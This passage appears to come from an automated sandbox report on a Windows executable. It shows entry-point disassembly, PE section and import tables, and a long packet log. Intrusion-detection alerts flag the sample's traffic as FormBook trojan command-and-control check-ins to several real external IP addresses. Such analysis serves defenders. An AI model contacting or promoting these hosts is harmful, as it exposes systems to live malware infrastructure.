                                                                                                                                                                          push 00000009h
                                                                                                                                                                          call 00007FCA0935B504h
                                                                                                                                                                          push 00000007h
                                                                                                                                                                          call 00007FCA0935B4FDh
                                                                                                                                                                          mov dword ptr [00423704h], eax
                                                                                                                                                                          call dword ptr [00407044h]
                                                                                                                                                                          push ebx
                                                                                                                                                                          call dword ptr [00407288h]
                                                                                                                                                                          mov dword ptr [004237B8h], eax
                                                                                                                                                                          push ebx
                                                                                                                                                                          lea eax, dword ptr [esp+38h]
                                                                                                                                                                          push 00000160h
                                                                                                                                                                          push eax
                                                                                                                                                                          push ebx
                                                                                                                                                                          push 0041ECC8h
                                                                                                                                                                          call dword ptr [00407174h]
                                                                                                                                                                          push 00409188h
                                                                                                                                                                          push 00422F00h
                                                                                                                                                                          call 00007FCA0935B127h
                                                                                                                                                                          call dword ptr [0040709Ch]
                                                                                                                                                                          mov ebp, 00429000h
                                                                                                                                                                          push eax
                                                                                                                                                                          push ebp
                                                                                                                                                                          call 00007FCA0935B115h
                                                                                                                                                                          push ebx
                                                                                                                                                                          call dword ptr [00407154h]
                                                                                                                                                                          Programming Language:
                                                                                                                                                                          • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x74280xa0.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000x16a8.rsrc
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x46d900x1f10
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                          .text0x10000x5c5b0x5e00False0.6603640292553191data6.411456379497882IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .rdata0x70000x12460x1400False0.42734375data5.005029341587408IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .data0x90000x1a7f80x400False0.6376953125data5.108396988130901IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                          .ndata0x240000x170000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                          .rsrc0x3b0000x16a80x1800False0.3681640625data4.643642871246492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                          NameRVASizeTypeLanguageCountry
                                                                                                                                                                          RT_BITMAP0x3b2380x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States
                                                                                                                                                                          RT_ICON0x3b5a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152, 256 important colorsEnglishUnited States
                                                                                                                                                                          RT_DIALOG0x3be480x144dataEnglishUnited States
                                                                                                                                                                          RT_DIALOG0x3bf900x13cdataEnglishUnited States
                                                                                                                                                                          RT_DIALOG0x3c0d00x100dataEnglishUnited States
                                                                                                                                                                          RT_DIALOG0x3c1d00x11cdataEnglishUnited States
                                                                                                                                                                          RT_DIALOG0x3c2f00x60dataEnglishUnited States
                                                                                                                                                                          RT_GROUP_ICON0x3c3500x14dataEnglishUnited States
                                                                                                                                                                          RT_MANIFEST0x3c3680x33dXML 1.0 document, ASCII text, with very long lines (829), with no line terminatorsEnglishUnited States
                                                                                                                                                                          DLLImport
                                                                                                                                                                          KERNEL32.dllSetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                                                                                                                                                          USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                                                                                                                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                                                          SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                                                                                                                          ADVAPI32.dllRegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                                                                                          COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                          EnglishUnited States
                                                                                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                          192.168.11.20103.63.2.17549870802031412 12/05/22-15:16:29.824802TCP2031412ET TROJAN FormBook CnC Checkin (GET)4987080192.168.11.20103.63.2.175
                                                                                                                                                                          192.168.11.20185.101.158.23949883802031453 12/05/22-15:17:12.752525TCP2031453ET TROJAN FormBook CnC Checkin (GET)4988380192.168.11.20185.101.158.239
                                                                                                                                                                          192.168.11.20103.63.2.17549870802031453 12/05/22-15:16:29.824802TCP2031453ET TROJAN FormBook CnC Checkin (GET)4987080192.168.11.20103.63.2.175
                                                                                                                                                                          192.168.11.20192.185.32.15749850802031449 12/05/22-15:15:32.371812TCP2031449ET TROJAN FormBook CnC Checkin (GET)4985080192.168.11.20192.185.32.157
                                                                                                                                                                          192.168.11.20192.185.32.15749912802031453 12/05/22-15:18:48.078621TCP2031453ET TROJAN FormBook CnC Checkin (GET)4991280192.168.11.20192.185.32.157
                                                                                                                                                                          192.168.11.20185.101.158.23949883802031412 12/05/22-15:17:12.752525TCP2031412ET TROJAN FormBook CnC Checkin (GET)4988380192.168.11.20185.101.158.239
                                                                                                                                                                          192.168.11.20103.63.2.17549938802031449 12/05/22-15:19:44.781098TCP2031449ET TROJAN FormBook CnC Checkin (GET)4993880192.168.11.20103.63.2.175
                                                                                                                                                                          192.168.11.201.1.1.163234532014169 12/05/22-15:15:00.577362UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6323453192.168.11.201.1.1.1
                                                                                                                                                                          192.168.11.20192.185.32.15749912802031449 12/05/22-15:18:48.078621TCP2031449ET TROJAN FormBook CnC Checkin (GET)4991280192.168.11.20192.185.32.157
                                                                                                                                                                          192.168.11.20194.245.148.18949879802031449 12/05/22-15:17:01.537708TCP2031449ET TROJAN FormBook CnC Checkin (GET)4987980192.168.11.20194.245.148.189
                                                                                                                                                                          192.168.11.2045.130.41.2449840802031449 12/05/22-15:15:06.993468TCP2031449ET TROJAN FormBook CnC Checkin (GET)4984080192.168.11.2045.130.41.24
                                                                                                                                                                          192.168.11.20103.63.2.17549870802031449 12/05/22-15:16:29.824802TCP2031449ET TROJAN FormBook CnC Checkin (GET)4987080192.168.11.20103.63.2.175
                                                                                                                                                                          192.168.11.2045.130.41.2449904802031453 12/05/22-15:18:23.919550TCP2031453ET TROJAN FormBook CnC Checkin (GET)4990480192.168.11.2045.130.41.24
                                                                                                                                                                          192.168.11.20192.185.32.15749850802031453 12/05/22-15:15:32.371812TCP2031453ET TROJAN FormBook CnC Checkin (GET)4985080192.168.11.20192.185.32.157
                                                                                                                                                                          192.168.11.2045.130.41.2449904802031412 12/05/22-15:18:23.919550TCP2031412ET TROJAN FormBook CnC Checkin (GET)4990480192.168.11.2045.130.41.24
                                                                                                                                                                          192.168.11.20192.185.32.15749850802031412 12/05/22-15:15:32.371812TCP2031412ET TROJAN FormBook CnC Checkin (GET)4985080192.168.11.20192.185.32.157
                                                                                                                                                                          192.168.11.20103.63.2.17549938802031453 12/05/22-15:19:44.781098TCP2031453ET TROJAN FormBook CnC Checkin (GET)4993880192.168.11.20103.63.2.175
                                                                                                                                                                          192.168.11.20185.101.158.23949883802031449 12/05/22-15:17:12.752525TCP2031449ET TROJAN FormBook CnC Checkin (GET)4988380192.168.11.20185.101.158.239
                                                                                                                                                                          192.168.11.2045.130.41.2449840802031412 12/05/22-15:15:06.993468TCP2031412ET TROJAN FormBook CnC Checkin (GET)4984080192.168.11.2045.130.41.24
                                                                                                                                                                          192.168.11.20192.185.32.15749912802031412 12/05/22-15:18:48.078621TCP2031412ET TROJAN FormBook CnC Checkin (GET)4991280192.168.11.20192.185.32.157
                                                                                                                                                                          192.168.11.20103.63.2.17549938802031412 12/05/22-15:19:44.781098TCP2031412ET TROJAN FormBook CnC Checkin (GET)4993880192.168.11.20103.63.2.175
                                                                                                                                                                          192.168.11.2045.130.41.2449840802031453 12/05/22-15:15:06.993468TCP2031453ET TROJAN FormBook CnC Checkin (GET)4984080192.168.11.2045.130.41.24
                                                                                                                                                                          192.168.11.2045.130.41.2449904802031449 12/05/22-15:18:23.919550TCP2031449ET TROJAN FormBook CnC Checkin (GET)4990480192.168.11.2045.130.41.24
                                                                                                                                                                          192.168.11.20194.245.148.18949879802031453 12/05/22-15:17:01.537708TCP2031453ET TROJAN FormBook CnC Checkin (GET)4987980192.168.11.20194.245.148.189
                                                                                                                                                                          192.168.11.20194.245.148.18949879802031412 12/05/22-15:17:01.537708TCP2031412ET TROJAN FormBook CnC Checkin (GET)4987980192.168.11.20194.245.148.189
                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                          Dec 5, 2022 15:13:33.629997015 CET49821443192.168.11.20172.217.23.110
                                                                                                                                                                          Dec 5, 2022 15:13:33.630106926 CET44349821172.217.23.110192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:33.630258083 CET49821443192.168.11.20172.217.23.110
                                                                                                                                                                          Dec 5, 2022 15:13:33.655256987 CET49821443192.168.11.20172.217.23.110
                                                                                                                                                                          Dec 5, 2022 15:13:33.655313015 CET44349821172.217.23.110192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:33.691273928 CET44349821172.217.23.110192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:33.691550970 CET49821443192.168.11.20172.217.23.110
                                                                                                                                                                          Dec 5, 2022 15:13:33.691946983 CET44349821172.217.23.110192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:33.692195892 CET49821443192.168.11.20172.217.23.110
                                                                                                                                                                          Dec 5, 2022 15:13:33.860373020 CET49821443192.168.11.20172.217.23.110
                                                                                                                                                                          Dec 5, 2022 15:13:33.860896111 CET44349821172.217.23.110192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:33.861090899 CET49821443192.168.11.20172.217.23.110
                                                                                                                                                                          Dec 5, 2022 15:13:33.867636919 CET49821443192.168.11.20172.217.23.110
                                                                                                                                                                          Dec 5, 2022 15:13:33.908360958 CET44349821172.217.23.110192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:34.515096903 CET44349821172.217.23.110192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:34.515376091 CET44349821172.217.23.110192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:34.515431881 CET49821443192.168.11.20172.217.23.110
                                                                                                                                                                          Dec 5, 2022 15:13:34.515615940 CET49821443192.168.11.20172.217.23.110
                                                                                                                                                                          Dec 5, 2022 15:13:34.515680075 CET49821443192.168.11.20172.217.23.110
                                                                                                                                                                          Dec 5, 2022 15:13:34.515681028 CET49821443192.168.11.20172.217.23.110
                                                                                                                                                                          Dec 5, 2022 15:13:34.515738010 CET44349821172.217.23.110192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:34.515969038 CET49821443192.168.11.20172.217.23.110
                                                                                                                                                                          Dec 5, 2022 15:13:34.691198111 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:34.691283941 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:34.691441059 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:34.691809893 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:34.691854954 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:34.754673958 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:34.754821062 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:34.754890919 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:34.756876945 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:34.757126093 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:34.760481119 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:34.760507107 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:34.761181116 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:34.761318922 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:34.764353991 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:34.808501959 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.114306927 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.114522934 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.114583015 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.114784956 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.114953995 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.115153074 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.115751982 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.115950108 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.115950108 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.116099119 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.116766930 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.117001057 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.117047071 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.117213964 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.117249966 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.117409945 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.117474079 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.117688894 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.117721081 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.118026018 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.122776031 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.122956038 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.123003006 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.123152971 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.123198032 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.123341084 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.123378038 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.123594046 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.123631001 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.123788118 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.123821974 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.123974085 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.124067068 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.124233961 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.124268055 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.124411106 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.124452114 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.124608994 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.125113010 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.125272036 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.125314951 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.125494003 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.125531912 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.125684023 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.125792027 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.125942945 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.125976086 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.126133919 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.126195908 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.126347065 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.126439095 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.126591921 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.126807928 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.126970053 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.127027035 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.127211094 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.127250910 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.127480030 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.127661943 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.127811909 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.127850056 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.127995014 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.128024101 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.128174067 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.128504038 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.128761053 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.128797054 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.129123926 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.129187107 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.129390001 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.129511118 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.129842043 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.130009890 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.130028009 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.130054951 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.130224943 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.130373001 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.130503893 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.130723000 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.130764961 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.130923986 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.130955935 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.131145000 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.131206036 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.131413937 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.131448984 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.131608009 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.131644011 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.131793022 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.132008076 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.132152081 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.132184029 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.132405996 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.132446051 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.132558107 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.132633924 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.132782936 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.132843971 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.133016109 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.133045912 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.133187056 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.133210897 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.133375883 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.133414030 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.133646965 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.133681059 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.133825064 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.133856058 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.134015083 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.134044886 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.134274960 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.134288073 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.134318113 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.134412050 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.134601116 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.134635925 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.134783983 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.134815931 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.134968042 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.134998083 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.135202885 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.135232925 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.135340929 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.135370016 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.135555029 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.135588884 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.135814905 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.135879040 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.135915041 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.135967970 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.136061907 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.136090040 CET44349823142.250.184.225192.168.11.20
